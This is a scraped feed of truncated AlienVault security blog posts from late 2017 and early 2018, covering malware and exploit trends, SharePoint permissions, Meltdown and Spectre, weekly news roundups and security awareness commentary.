	2018-01-24 14:00:00	Mental Models & Security: Thinking Like a Hacker (lien direct)	In the world of information security, people are often told to “think like a hacker,” which inevitably reminds me of Sylvester Stallone muttering his line in Demolition Man -- “Send a maniac to catch a maniac”. While such words of wisdom work great for movies, they tend not to be very helpful for those trying to understand it. If you think of a hacker with a very narrow definition (e.g. someone that only breaks web applications), it leads to a counterproductive way of thinking and conducting business. A little knowledge is a dangerous thing, not least because isolated facts don’t stand on their own very well. As legendary investor Charlie Munger once said: “Well, the first rule is that you can't really know anything if you just remember isolated facts and try and bang 'em back. If the facts don't hang together on a latticework of theory, you don't have them in a usable form. You've got to have models in your head. And you've got to array your experience both vicarious and direct on this latticework of models. You may have noticed students who just try to remember and pound back what is remembered. Well, they fail in school and in life. You've got to hang experience on a latticework of models in your head. What are the models? Well, the first rule is that you've got to have multiple models because if you just have one or two that you're using, the nature of human psychology is such that you'll torture reality so that it fits your models, or at least you'll think it does. …” For security pros, it’s worth bearing this in mind. Multiple mental models from different disciplines are needed to make good and informed decisions. When we look at the thought process of a (competent) security professional, it encompasses many mental models. These don’t relate exclusively to hacking or wider technology, but instead cover principles that have broader applications. Let’s look at some general mental models and their security applications: 1. Inversion Difficult problems are best solved when they are worked backwards. Researchers are great at inverting systems and technologies to illustrate what the system architect would have rather avoided. In other words, it’s not just enough to think about all the things that can be done to secure a system, but to think about all the things that would leave a system insecure. From a defensive point of view, it means not just thinking about how to achieve success, but also how failure would be managed. 2. Confirmation Bias What someone wishes, they also believe. We see confirmation bias deeply-rooted in applications, systems, and even entire businesses. It means that two people with opposing views on a topic can see the same evidence and come away feeling validated by it. It’s why two auditors can assess the same system and arrive at vastly different conclusions as to its adequacy. However, confirmation bias is extremely dangerous from a defenders’ perspective, and clouds judgement. This is something hackers take advantage of all the time. People often fall for phishing emails because they believe they are too clever to fall for one, or too insignificant to be targeted. It’s only until it’s too late that reality sets in. 3. Circle of Competence Most people have a thing they’re really, truly good at. But if you test them in something outside of this area, you’ll find they’re not particularly well-rounded. Worse, they may be ignorant of their own ignorance -- you probably know this as the Dunning-Kruge	Guideline
	2018-01-23 14:00:00	OTX Trends Part 2: Malware (lien direct)	By Javvad Malik and Christopher Doman This is the second of a three part series on trends identified by AlienVault. Part 1 focused on the exploits tracked by OTX. This blog will talk about the malware, and Part 3 will discuss trends we’re seeing in threat actors. Which malware should I be most concerned about? Most security incidents that a security team will respond to involve malware. We took a look at three sources of malware telemetry to help prioritise popular malware families: Malware families AlienVault customers detect the most; Which malware domains are observed the most frequently by Cisco’s Umbrella DNS; and Malware families with the highest number of individual samples Which malware families do our customers detect the most? The following table describes the malware that we detected most frequently on our customers networks: This table represents malware detected by AlienVault as it communicates across a network, in 2017. This data is biased towards families that we have named network detections for. That means this table is a good representation of malware that is actively running on networks, though it’s important to also review other statistics on malware that has been blocked from running. The #1 ranked malware, njRat, is particularly popular in the Middle East. It’s a fairly simple .NET backdoor and Youtube is full of videos of how amateur users can deploy it. We often see it packed with a seemingly endless supply of custom packers to evade anti-virus. Whilst the vast bulk of njRat users are low-level criminals, it is also frequently used in targeted political attacks in the Middle East. A Youtube guide for using njRat The #2 ranked malware, NetWire, is primarily used by low-end criminals to steal banking details. Again, it is a freely available tool and has also been abused by targeted attackers too. The top malware we saw for Linux was China ELF DDoS. We saw little malware for Mac, though the adware MacKeeper was popular. Which malware domains are observed the most frequently? We matched known malicious domains from AlienVault OTX against Umbrella DNS’s record of the most visited domains by their customers. From that we produced this table of the “most popular malicious domains”: The column		APT33 Wannacry APT 33
	2018-01-22 14:00:00	SharePoint Security Best Practices (lien direct)	Being conscientious of SharePoint security is simple if you understand the basics. SharePoint is a Microsoft platform which is designed to integrate with Microsoft Office. Microsoft launched the product in 2001. SharePoint is useful for thousands of organizations worldwide because it facilitates sharing documents on private web servers. SharePoint can be purchased as a separate product to deploy on your own intranet web servers, or you can use SharePoint Online as a component of many Office 365 packages. SharePoint Online is hosted on Microsoft’s own servers.. But poorly secured web servers and web applications can make organizations vulnerable to cyber-attack. Some of a company’s documents that are distributed through SharePoint may contain sensitive or proprietary information, and you don’t want them to fall into the hands of cyber attackers who could be either internal or external to your network! This quick guide will show you how to use and deploy SharePoint in a secure way so your organization can enjoy the convenience and functionality of SharePoint without introducing vulnerabilities to your corporate network. SharePoint security permission levels There are various different types of permissions you can grant users in your SharePoint system. Full Control- These users have all possible SharePoint permissions, and this permission is granted to all members of the Owners group by default. Be careful about which users you place in the Owners security group or otherwise grant Full Control permission. The best practice here is to only grant a limited number of administrators this permission. Edit- This permission enables users to add, edit, and delete lists, and to view, add, update, and delete documents and list items. By default, all users in the Members security group have this permission. So don’t place users in the Members group who only need to view, read, or contribute documents. Design- Users with this permission can create lists and document libraries. They can also make sites look pretty by editing pages, applying themes, style sheets, and borders. No security group is assigned this permission automatically. So if you want some users to be able to make aesthetic changes to your SharePoint site pages who aren’t administrators in your Owners group with Full Control, then you’ll have to manually assign this permission to another group or to individual users. Contribute- This is a more limited version of the Edit permission. Users with the Contribute permission can add, update, view, and delete documents and list items. Read- This permission should be granted to users who just need to view and download documents, and may also need to see historical versions of documents. Restricted Read- These users can view pages and documents, but they can’t see historical versions of documents or user permissions. In most cases where a user only needs to be able to read the documents on a site, this is the best permission to grant them. View Only- These users can view pages, items and documents. They can only download documents that cannot be viewed in their web browser. Limited Access- This permission only grants users some access to a specific page or file as opposed to an entire site. This level is automatically assigned by SharePoint when you provide access to one specific item. You can’t directly grant this permi
	2018-01-19 14:00:00	Things I Hearted this Week – 19th Jan 2018 (lien direct)	Happy Friday wonderful people. It’s been a busy week in infosec with a flurry of activity, so let’s jump right in. The 100 Billion Dollar Infosec Question If someone gave you 100 billion dollars to improve information security, how would you spend it? No, seriously, please. Give it some thought. This question spurred Dan Klinedist to pen his thoughts in a thought-provoking post that will probably leave you with more questions than answers. The 100 Billion Dollar Infosec Question \| Dan Klinedinst, Medium IT Security Spending to reach $96 billion in 2018 \| Dark Reading Putting the bug in bounty I’m a big fan of bug bounties, I think that they have a lot of benefits. But, as with any emerging service, there will be issues. One of them is differentiating between Bug Bounty and Security Consulting or Testing. And that can cause some problems, which are very well articulated by John Carroll. BugBounty != Security Consulting \| CTU Security Inside Uber’s $100,000 Payment to a Hacker, and the Fallout \| NY Times Mirai Okiru botnet targets ARC-based IoT devices For those of you who don't know, ARC (Argonaut RISC Core) processors are the second most widely used processors in the world and can be found in all manner of unassuming connected devices, from car tech to storage, home and mobile devices. The new Mirai botnet, known as Mirai Okiru, is going after them with the aim knock them offline with distributed denial of service (DDoS) attacks. Mirai Okiru botnet targets for first time ever in the history ARC-based IoT devices \| Security Affairs Mirai Okiru is a botnet that's going after ARC-based IoT gadgets \| The Inquirer Mirai Okiru: New DDoS botnet targets ARC-based IoT devices \| CSO Mental Models & Security: Thinking Like a Hacker Is it weird that I’m including one of my own articles from this week? Is that the equivalent of someone liking their own facebook posts? I’ve been reading up on mental models lately a lot and thought a lot could be applied to security, or as is often said, to think like a hacker. I listed seven of my favourite models in this Dark Reading contributed article. Mental Models & Security: Thinking Like a Hacker \| Dark Reading LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials	Guideline	Uber
	2018-01-18 14:00:00	Shakespeare\'s Netymology (lien direct)	One of the coolest things about editing in the tech space, for a word nerd like me, is that the language is brand-new, ad-hoc, and usually made up on the fly by an engineer or security researcher frantically trying to communicate a new idea without saying something like, “and then the thing happens…” The technical term for a word entirely new to the language, describing a previously undescribed event, generated by a subject matter expert in that field, is a protologism. In other fields, like literary criticism, sociology, and politics — places that, frankly, move slower than we do — a word can remain a protologism for years while people debate and consider, before finally accepting it, and it becomes a neologism. Neologisms are words that have been widely adopted, and where the initial source can be pretty readily ascertained. Because technical editors and technical writers are also looking for ways to describe that thing that happens, we tend to be early adopters of protologisms, and move words along the spectrum to neologisms as fast as we upgrade the technology itself. As Shakespeare said in Henry V, “We, my dear, are the makers of fashion.” We also are the greatest generators of new language since Shakespeare (who added something around 2,000 words in a veritable Renaissance for the English language as it existed then). And because our teams tend to be highly diverse, made up of people from all over the world, the words we generate in tech tend to be words that can be plugged in across languages – they’re not unique to any particular language, and tend to resist translation. They end up being naturalized, or transliterated, rather than strictly translated. These transliterations end up being generated often through TAP, or Think-Aloud Protocol, which is another beautiful thing technology processes has given the world (most of us call it “muttering to ourselves.”) There’s even a tech-specific word for what this article is about: netymology; the origin and derivation of technical terms. When you’re in the business of creating software that addresses newly-developing online threats, the terminology practically generates itself. A quick stroll through AlienVault’s Open Threat Exchange® (OTX™) will show you all kinds of words that have never been defined. And it’s my job to get those into a glossary for you. It works like this: Attacker (not hacker, for the love of all things fluffy) attacks. Researchers discover. Pulse gets written. I read the pulses, identify the “…and then the thing happens” terms, research to see where along the protologism > neologism spectrum it falls by seeing if anyone anywhere else is talking about the word, and how they are talking about them, create a definition, and drop that into the glossary that then gets used in the documentation. I’m pretty serious about clear, easy to understand documentation. I think that we, who eat and sleep and breathe new technology, owe it to the users who aren’t in the room where the “…and then the thing happens” moments occur, to make those language evolutions as clear as possible, as u
	2018-01-16 14:00:00	OTX Trends Part 1- Exploits (lien direct)	By Javvad Malik and Christopher Doman Introduction Every year, AlienVault records billions of anonymised security events from our customers. This telemetry can be aggregated to establish macro trends. And for many years, we have also been comprehensively recording other vendors' threat reports in our Open Threat Exchange (OTX) platform. We have combined these two data-sets to help provide a blueprint for how to prioritise the response to varied threats. You can find the scripts we used to get this data from our free APIs on GitHub. Executive Summary Some of the standout findings from our data covering 2017 are: The most effective exploits quickly proliferate between a number of criminal and nation state groups. Some remain popular for a number of years after their initial discovery. njRat malware variants were the most prevalent malware we saw persisting on networks. Of the ten most popular domains associated with malware, four were sinkholed by MalwareTech. Confirmation of others’ findings of the changing targeted threat landscape. There has been a significant increase in reports on attackers reportedly located in Russia and North Korea. There has also been a significant drop in reports of activity emanating from groups operating from China. OTX Trends: Exploits This is the first of a three part series on the trends we identified in 2017: Part 1 focuses on exploits Part 2 will talk about the malware of concern and trends Part 3 will discuss threat actors and patterns Which exploits should I be most concerned about? There are many thousands of exploits that are assigned a CVE number every year, and many more that don’t go reported. If you’re responsible for an organisation’s security, it’s important to know: Which ones are the most important to patch quickly? Which ones are being actively exploited in the wild? What exploits are being reported in vendor reports? The following table shows exploits in order of the number of times they have been referenced in vendor reports on OTX: A CVE 2017-0199 sample used by criminals This table is from a fairly small data-set of approximately 80 vendor reports from this 2017 – but it still provides a number of insights: Effective exploits proliferate quickly The #1 ranked exploit CVE-2017-0199 is extremely popular. It has been used by targeted attackers in locations as diverse as North Korea (FreeMilk), China (Winnti) and Iran (Oilrig). It has also been heavily abused by criminal gangs such as some of those deploying Dridex.		APT 34
	2018-01-12 14:00:00	Things I hearted this week: 12th Jan 2018 (lien direct)	Carphone Warehouse Fined £400,000 The Information Commissioner’s Office (ICO) has fined Carphone Warehouse an eye-watering £400,00 for what it referred to as distinct and significant inadequacies in the phone company’s security controls. The full report by the ICO (PDF) is worth reading. It goes into a lot of detail around the vulnerabilities such as the attacker scanning using Nikto, and gaining access to a woefully out-of-date WordPress installation that was running its CMS. It also covers how credentials were stored in plaintext and how the attacker was able to access large amounts of personal data. There are many more details in the report, that I highly encourage you to read, but essentially it boils down to an absence of fundamental security controls, no assurance to verify systems were secured, and a lack of monitoring or detection controls in place. Carphone Warehouse cops £400k fine after hack exposed 3 meeellion folks’ data \| The Register Britain fines Carphone Warehouse 400,000 pounds over data breach \| Reuters Data protection bill amended to protect security researchers The UK has revealed amendments to its data protection bill to de-criminalise research into whether anonymised data sets are sufficiently anonymous. This is very good news for researchers who may have been worried they could be prosecuted for demonstrating weaknesses in anonymization. UK gov updates Data Protection bill to protect security researchers \| The Inquirer UK Data Protection Bill tweaked to protect security researchers \| The Register Data protection bill amended to protect security researchers \| The Guardian Data Protection Bill \| Parliament UK (pdf) Toy firm VTech fined over data breach VTech, the ‘smart’ toy manufacturer has been fined $650,000 by the FTC after exposing the data of millions of parents and children. Troy Hunt brought up the issue back in November 2015 and it made for a chilling read. Not only was the website not secure, but the data was not encrypted in transit or at rest. Hopefully, this kind of crackdown on weak ‘smart’ devices will continue until we see some changes. Not that I enjoy seeing companies being fined, but it doesn’t seem like many manufacturers are paying much attention to security. FTC fines VTech toy firm over data b
	2018-01-11 14:00:00	Cryptocurrency Isn\'t Crypto (lien direct)	For the love of all things glittery, you guys, here I am with this lovely platform from which to rant about language development around developing technology and what happens? Bruce freaking Schneier blogs about inappropriate language use around developing technology; specifically, that “Crypto” Is Being Redefined as Cryptocurrencies. I am all aswoon; I’ve been a serious Schneier fan for a really long time. So you can take it to the bank (see what I did there?) when he says, It is a stupid name. Woot! Because it is a stupid name. And this is precisely the sort of ridiculous media-propelled distortion that leads to really bad language use (no, not that kind of bad language. The other kind of bad language). And if Bruce backs me up, life is good. Turns out, Lorenzo Franceschi-Bicchierai (@lorenzoFB) also agrees with me. As a writer, I try to remind myself every day that words matter. For example, when I write about hackers, I try to keep in mind that the word has a controversial history and can have a certain connotation. (Gosh, where have we heard that rant before?) He goes on to say, But this is not just a matter of pedantic semantics. As Green explained, cryptography is starting to matter more and more in meatspace, where regular people live, people who might not know about revived 1990s tech policy controversies. Think of the legal battle between Apple and FBI, or popular and damaging malware like ransomware, which often use cryptographic functions to lock files. “If people know what ‘crypto’ is, they should know it as a real technology—not as some synonym for Bitcoin,” he said. So if you care about this, please politely correct people who incorrectly use the word “crypto.” Or maybe make fun of it, as Ryan Stortz, a security researcher in New York suggested. In a chat, he joked that he wants to start trolling people by referring to cryptocurrencies as “Block,” short for “blockchain technologies.” Honestly, though, whatever it takes. Our constant ally, the Merriam-Webster Online Dictionary, once again comes to the rescue. If you search “crypto” they let you know that it’s an abbreviation for the noun cryptography. For a word having to do with secrets, "cryptography" has a surprisingly transparent etymology. The word traces back to the Greek roots kryptos, meaning "hidden," and graphein, meaning "to write." "Kryptos" - which in turn traces to the Greek verb kryptein, meaning "to hide" - is a root shared by several English words, including "crypt," "cryptic," and "encrypt." "Krypton," the name of a colorless gaseous element used especially in some fluorescent lamps and photography flashes, also comes from "kryptos." The name was chosen because the gas is rare and hard to find. There is literally nothing in the word “crypto” th	Guideline
	2018-01-11 02:53:00	Improve Your Readiness To Defeat Meltdown & Spectre (lien direct)	You were just getting back into the swing of things after bringing in the New Year, and it happened. Like a huge firework exploding with a thump that you can feel through your body, the news of Meltdown and Spectre hit the media on January 3, 2018. Since the official disclosure of Meltdown and Spectre, there has been a flurry of news articles, as well as activity by the major processor and operating system vendors, and the community at large, to address these significant flaws. But, just what are these flaws, how are you impacted, and what should you do about them? About Spectre and Meltdown Discovered by researchers that include the Google Project Zero, several academic institutions, and some private companies, Spectre and Meltdown exploit design flaws existing in nearly all processors manufactured since 1995 that enable exfiltration of data within the CPU cache. Without getting into ‘too’ much detail: Meltdown (outlined in CVE-2017-5754) impacts Intel and Apple processors, and exploits the Intel Privilege Escalation and Speculative Escalation processor functions to read any memory on the system and execute code on the system. Spectre (outlined in CVE-2017-5715 and CVE-2017-5753) affects chips manufactured by Intel, Apple, ARM and AMD, and exploits the Branch Prediction and Speculative Execution processor functions to allow access to another user’s data within the same application, or even data from another application. But, “What is speculative execution and branch prediction?” I hear you ask. The quick explanation is that these are functions that were designed to increase the performance of the chip by predicting what the application or system needs next. If it predicts correctly, then the processed information becomes immediately available. It’s similar in concept to a fast food restaurant that prepares your food before you arrive, so that you don’t have to wait in line while they cook it. Of course, if you want a deeper explanation of the technology and the exploits, you can read the technical papers published on Meltdown and Spectre. A quick summary of the attacks can be seen in the following table, based on information from Daniel Miessler. Am I At Risk? More than likely you are at risk, given that the flaws affect nearly every processor manufactured from 1995 through to today. However, both exploits require that code be executed directly on the system, requiring access as a local administrator or user. This typically makes it difficult to exploit these vulnerabilities, although the Spectre flaw was able to be exploited through a JavaScript-based attack though unpatched browsers (noting that patches for many popular browsers have already been issued, so be sure to update them!). Are There Any Known Attacks That Use Meltdown or Spectre? So far, Meltdown and Spectre are not known to have been used to steal data. That said, compromise can be difficult to detect. The AlienVault Labs	Guideline
	2018-01-09 14:00:00	Top 17 Blogs from \'17 (lien direct)	It was a great year in blogs for AlienVault! Here are the top blogs from 2017, selected by number of views from all sources. Drumroll please. Explain Bitcoin to Me by Tristan Johns. It’s an approachable but technical explanation of how Bitcoin works. MacSpy: OS X RAT as a Service by Peter Ewane. It’s about one of the first malware-as-a-service (MaaS) for OS X. Configuring Kali Linux on Amazon AWS Cloud for FREE by Irfan Shakeel. If you want to experiment with pentesting without spending money, this blog will let you know how. How Does Whonix Make Kali Linux Anonymous & How to Prevent It? by Irfan Shakeel. Learn what Whonix is and how it works, and how it can be used to go incognito while using Kali Linux. There’s also info on how to prevent folks from doing in in your corporate network. Ongoing WannaCry Ransomware Spreading Through SMB Vulnerability by AlienVault Labs. The blog details findings on WannaCry as it started in May 2017. LockCrypt Ransomware Spreading via RDP Brute-Force Attacks by Chris Doman. Best Advice for a Career in Cyber Security by Ryan Leatherbury. Ryan discusses networking, conferences, blogs, InfoSec on Twitter, hands-on tools, mentors and more! It’s Only a Hacker if It’s Linus Himself by Laureen Hudson. At AlienVault, we stick to precisely descriptive terms; we have malicious actors, we have security researchers, but unless we have the fortune to be talking about Linus himself, you’ll never see hackers in our documentation. How the Vote Hacking Was Done at DefCon25 by @notpandapants. From a guest blogger who participated. The Diebold ExpressPoll 5000 is a piece of election hardware that is compromised to the core, and creates a hacker-friendly platform for large-scale election manipulation, on multiple fronts. Interesting blog, but a little scary too. Red Teamers Can Learn Secrets by Purple Teaming by Haydn Johnson. Great guest blog by a practitioner, teaching us why Red Teamers Should “Purple Team it”. MacronLeaks – A Timeline of Events by Chris Doman. Chris discusses the implications of leaked documents and the 2017 French election. How to Prepare to Take the OSCP by Blade Soriano. Guest blogge		Wannacry
	2018-01-05 14:00:00	Things I Hearted this Week 5th Jan 2018 (lien direct)	The opening of movies sets the tone for the rest of the film. Within the first few minutes you usually get an idea of the characters, whether it's a slow suspense, a drama, or action flick. If the first few days of 2018 are any indication, the IT Security world has kicked off with a dizzying Michael Bay-esque opening action sequence with rapid cuts that would rival any Edgar Wright montage. So let's jump head first right into it. Meltdown Step aside Heartbleed, and forget all about WannaCry, there's a new duo of attacks in town, complete with logos, websites, and tales of doom. Meltdown Attack, the website. Google Project Zero blog NCSC’s advice Replace CPU hardware – legit advice. Linus Torvald was not happy, and issued a strongly-worded statement Mozilla Confirms Web-Based Execution Vector for Meltdown and Spectre Attacks \| Bleeping Computer Facebook and India’s controversial National ID Database Facebook has clarified that it’s not asking new users in India for their Aadhaar information while signing up for a new Facebook account. Aadhaar is India’s biometric ID system that links the demographic information of more than a billion Indians with their fingerprints and iris scans, and stores it in a centralized government-owned database that both government agencies and private companies can access to authenticate people’s identities. The program has been slammed by critics for enabling surveillance and violating privacy. Facebook said this was a “small test” that the company ran with a limited number of Indian users, and that its goal was to help new users understand how to sign up to Facebook with their real names. It sounds an awful lot like the “wallet inspector” in the school playground that would also then keep my money safe for me. Facebook Just Clarified That It Is Not Collecting Data From India's Controversial National ID Database \|Buzzfeed Rs 500, 10 minutes, and you have access to billion Aadhaar details \| The Tribune India Trackmageddon Two researchers have disclosed problems with hundreds of vulnerable GPS services using open APIs and trivial passwords (123456), resulting in a multitude of privacy issues including direct tracking. Further, many of the vulnerable services have open directories exposing logged data. For some, the vulnerabilities discovered and disclosed by Vangelis Stykas (@evstykas) and Michael Gruhn (@0x6d696368) aren't new. They were disclosed during Kiwicon in 2015 by Lachlan Temple, who demonstrated flaws in a popular car tracking immobilization device.		Wannacry Uber
	2018-01-04 14:00:00	What\'s More Important, the Red Team or the Blue Team (lien direct)	I ran a poll before the holidays, to understand the InfoSec community's thoughts and attitudes on Red Teaming versus Blue Teaming a bit better. As you likely know, Red Teamers are those who non-maliciously "attack" a company, and Blue Teamers are the defenders. We've had some interesting blogs on this topic, and for a very positive perspective on Red Teaming, check this guest blog out. {snp-blog-twitter-poll-security-fail-122117} However, it was a trick question! Both are necessary, as pointed out in this reply. A false question. Fire fighters vs. fire safety inspectors. Both are essential. If the inspector were completely successful then the fire fighter would get bored. Fortunately, complete success is impossible for either. Keeps us all employed. — C J Czelling (@CJCzelling) December 10, 2017 I gave the third option for those unwilling to choose sides. However, given the choice of only one, the majority of people chose Blue Team. It does make sense, if you only have one or the other, you had better have the defenders rather than more challengers than the already-existent bad guys attacking your company on a regular basis. If you're a small company, you might have only one person or one person part-time in the role of InfoSec, so when constrained - Blue Team is where you'll invest. Marcus Carey, a noted Blue Teamer, summed it up nicely. Blue team all the way. Add a dash of red to make it purple. — Marcus (@marcusjcarey) December 10, 2017 The fact that both are necessary was a consistent theme in the replies. There were several very specific comments around Purple teaming. It made me go back and re-read Haydn Johnson's blog on Purple Teaming from early 2017. Haydn makes the excellent point that Red Teamers benefit greatly by using some Blue Team tricks. Blue Teamers tend to know what really works, and the Red Team benefits from learning the Blue Team's Defense - Security Controls / Applications / Response. Here's a sampling of the Purple Team themed responses: Teamwork �� — Nathan (@NathOnSecurity) December 10, 2017 Purple obviously — Travis (@pinedtree) December 10, 2017 While I voted Blue Team, I have to say that I honestly feel as though a mixture of Blue and Red (Purple) is the best for
	2018-01-03 14:00:00	Fileless Attacks are Driving Up Security Complexity & Costs (lien direct)	If you feel like it’s getting harder and more expensive to protect your company from cyber attacks, you’re not alone. From streamlined startups to global enterprises, organizations in every industry are feeling the crunch as the threats they’re facing rapidly evolve. The Ponemon Institute’s 2017 State of Endpoint Security Risk report provides a thorough and enlightening overview of what’s happening. Now in its fifth consecutive year, this highly regarded report analyzes survey responses from more than 600 IT and security practitioners located in the United States. This year’s edition highlighted a few startling stats as well as some unsettling trends. What won’t surprise most IT professionals is that the threat of endpoint security risk has increased, due to both the rising number of attacks and the evolution of attack techniques. Also on the rise is the cost of attacks. Based on data collected for the report, the average total hard cost of a successful attack is more than $5 million, including IT and end-user productivity loss, system downtime, theft of information assets, and a variety of other damages. What may be overlooked, however, is that the complexity and day-to-day cost of defending against these attacks is becoming increasingly prohibitive. Evolving Attack Techniques Drive Higher Day-to-Day Prevention Costs Attackers are changing their approach based on what’s working. Looking at data for the past 12 months, the Ponemon report found that 54 percent of respondent organizations experienced one or more endpoint attacks that successfully compromised data assets and/or IT infrastructure. Of those successful attacks, 77 percent involved fileless techniques designed to evade detection by abusing legitimate system tools or launching malicious code from memory. Fileless techniques have long been used by sophisticated hacking groups, who typically aim their attacks at high-level targets like governments and large corporations. It was only a matter of time before these techniques were more widely adopted by cyber criminals. Now, because fileless attack techniques are expressly designed to exploit gaps in traditional security solutions, organizations large and small are finding themselves vulnerable. The urgent need to adapt existing protection to address fileless techniques is one of the primary factors driving up prevention costs. To begin with, the rapid proliferation of these types of attacks has caused organizations to lose faith in traditional antivirus (AV) security measures. As a result, companies are either replacing or supplementing their existing AV with new endpoint protection solutions. Unfortunately, because the majority of these options were designed to be used by large enterprise security teams they are typically too expensive and complex for mid-market organizations. Not only do these products incur up-front implementation costs in the form of professional installation services and other expenses, they also typically increase ongoing management costs because of things like: Greater expertise requirements: As traditional security solutions struggle to adapt to the new threats, both they and new entrants into the market are rolling out new features and functionality that make management more complex. This in turn can create additional service costs and also higher staffing fees as companies find they need to hire more senior IT security professionals to manage the advanced solutions. Additional time and resources spent on monitoring: The majority of solutions t
	2018-01-02 14:00:00	I Am Dave (lien direct)	This cartoon has been making the rounds on the internet for a long time. It depicts how all security technologies and efforts can be undone by “Dave” the ‘stupid user’. I can’t think of many (well no) real industries that treat their users, peers, and customers with the same level of disdain. Imagine the automotive industry pushing a similar message. ‘On one hand we have seatbelts, ABS, airbags, five star safety features… and on the other hand we have dumb drivers.’ Or a gym stating, ‘We have personal trainers, protein shakes, free weights, machines, exercise classes… and on the other hand, we have lazy people that just want to binge watch shows and eat pizza.” Maybe a college could claim, ‘We have the best teachers in the world, pity about the unruly students. No, seriously, I mean, governments have been overthrown for a lot less. I’m frankly quite surprised there hasn’t been at least some level of civil unrest where an unruly mob surrounded the IT Security department, only to be dispersed by the CISO, dressed in full riot gear with a water cannon. While most security advice for users is all well and good, it is far from practical for the vast majority. How do I know this? Well, after giving out security advice for most of my career, I recently found myself falling short of much of my own advice. Our CISO at AlienVault, John McLeod, is a very nice man. But I did feel the urge to shake a fist at him a few days ago after I fell victim to a rather clever phishing email he’d sent out as part of an awareness campaign. It was well-crafted, had no grammatical errors, and in my haste while on my phone, I clicked on the embedded link. There goes my perfect record of not falling for a simulated phishing email. Then I was hit by a second surprise as I was informed by a service provider that my account had been disabled due to my credentials being found in a breach. I was grateful to the service provider for informing me, so I went about diligently changing my password, when I realised that this provider also had two-factor authentication which I had not enabled. Three strikes. I then spent the better part of the next two hours changing old passwords (I may have reused a couple), enabling two-factor authentication wherever it was available, and doing a search for all my various credentials on haveibeenpwned.com. It made me realise how security still has a long way to go in perfecting its user experience. Creating products that users genuinely find useful, usable, credible, accessible, valuable, or even desirable. But most of all, it made me realise, that while I may work in IT Security, I too am Dave.
	2017-12-29 14:00:00	Things I Hearted this Week – 29th December 2017 (lien direct)	And here we are, the last week of 2017! Congratulations for making it through and thank you for sticking with us. I really enjoy pulling together these weekly recaps, and I hope you enjoy them and find them informative. This week has been a quiet week as people seem to be in constant limbo as to whether they should be working or vacationing. But I searched tirelessly for you – because that’s just the kind of person I am. Enjoy, and hope to see you again in 2018. Vendor Analyst Briefings Our very own Kate Brew started off a discussion on Twitter a few days ago on how many vendors don’t know how to brief analysts. Anton Chuvakin of Gartner chimed in with a detailed listing of do’s and don’t’s, followed closely by Adrian Sanabria sharing his experiences. Not wanting to be left out, I also added my 2cents. Thus completing the trilogy. Important: How to Impress / Annoy an Analyst During a Vendor Briefing? Best / Worst Tips Here! \| Anton Chuvakin, Gartner What is your product and what does it do? \| Adrian Sanabria, Savage Security Analyst Vendor Briefings \| Javvad Malik, J4vv4D Dressed for success Ed Amoroso offers some personal advice (especially for Millennials) on proper dress selection for men and women in the modern technology-based work environment that focuses on showing respect for others. Dress for Tech Success \| Edward Amoroso, LinkedIn Credential Stuffing With quite literally billions of leaked credentials available online, it is highly likely that some of these will be credentials for your customers — or worse — from your employees or organisation. These details can then be used by nefarious people to then systematically attempt to log into your service/business, in an attempt to takeover these accounts. This article will provide you with an overview of why and how these attacks take place, as well as provide you with some fingerprints and identifiers to help you monitor your environment for these types of attacks. Credential Stuffing: How breached credentials are put to bad use. \| Breachinsider.com Cryptocurrency mining malware Digimine spreads via Facebook messenger using a Google Chrome browser extension. This isn’t the first, and certainly won’t be the last example of cryptomining malware – something we may see increase in 2018. I should have added it to my list of predictions! Digimine Malware Steals Your Computer Power to Mine Crypto-Currency \| eWeek Rating Citizens The Chinese government plans to launch its Social Credit System in 2020. The aim? To judge the trustworthiness – or otherwise – of its 1.3 billion residents
	2017-12-27 14:00:00	Why Healthcare Security Awareness Training Doesn\'t Work (And What to Do About It) (lien direct)	The last five years have seen a meteoric rise in the number of cyberattacks targeting healthcare organizations. Why? Because healthcare organizations boast some of the lowest security budgets of any industry, and personal healthcare records are worth a fortune on the dark web. Don’t believe me? Try this: Threats actors can make between $285,000 - $1.7 million from a single successful healthcare data breach. At that rate of return, it really shouldn’t be surprising to see how regularly healthcare breaches are hitting the headlines. If you’re in the healthcare industry, you’re probably feeling concerned. After all, healthcare organizations are highly complex environments and they can be a tremendous challenge to secure. Where should you even start? User-Centric Security Before you start spending big out on expensive security products, it makes sense to look at where the greatest risks lie. To do that, let’s take a look at the most common causes of healthcare data breaches in recent years. According to the 2016 Data Breach Investigations Report, produced by Verizon, there are three primary concerns: 1.Insiders (mainly negligence) 2.Lost or stolen devices 3.Phishing Do you notice anything about these threats? Here’s a clue: They aren’t rooted in technology. Quite the opposite, in fact, they’re all rooted in human behavior. Now, of course, security products can be invaluable in dealing with these threats. Devices can be encrypted, user access levels can be tightly controlled, and network activity can be monitored. You can even use spam filters and content scanners to weed out most malicious communications. But what you can’t do is totally isolate your users from malicious activity… it’s just not possible. One way or another you users will be exposed, and they must be ready to deal with it. By making the effort to properly train your users, you can hugely raise the security profile of your security organization. Out with the Old If I had to guess, I’d say your existing security awareness training is… less than comprehensive. You’re not alone. In most healthcare organizations, security awareness training wouldn’t even exist if it wasn’t a major requirement of HIPAA compliance. But knowing that the greatest threats to your organization are all rooted in human error, doesn’t that seem crazy? If you’re genuinely serious about reducing cyber risk, there are going to need to be some dramatic changes. Perhaps the biggest problem I see with the average security training program is that it is focused on completely the wrong metric: Awareness. Ask any behavioral psychologist whether having more information causes people to make better decisions, and you know what they’ll say? Absolutely not. That’s why, despite understanding more than ever about nutrition, we have a glo
	2017-12-22 14:00:00	Things I Hearted this Week 22nd December 2017 (lien direct)	But we’ve always done (in)security this way Being an operator for the Twitter account for any large brand can be challenging and tough at the best of times. But it can be even more so when faced with security questions. When security experts on Twitter questioned NatWest_help why the homepage wasn’t secure the Bank initially tried to downplay the issue. But the bullying on Twitter forced the changes. Troy Hunt led the charge with “Securittyyyyy” much like Mel Gibson declared “Freeedom” in Braveheart, and NatWest finally gave in and upgraded within 48 hours. The Security Avengers (name pending) then fired a warning shot across other major banks which did not have secure homepages which has likely got many a security executive in a board room explaining likelihood and impact slides. I'm Sorry You Feel This Way NatWest, but HTTPS on Your Landing Page Is Important \| Troy Hunt NatWest overhauls web security after online confrontation \| Computing NatWest changes website security following heated exchange with cyber experts \| ITPro NatWest bank spat prompts web security changes \| BBC Why incident response is the best cybersecurity ROI Many times, there is little influence over what companies run and what it is run on. Chances are there will be failures or breaches – what is within the sphere of control is how well those incidents are responded to. Why incident response is the best cybersecurity ROI \| CSO Online Welcome to the hotel hackifornia Christoph Brandstatter is managing director of the four-star Seehotel, Jagerwirt, in 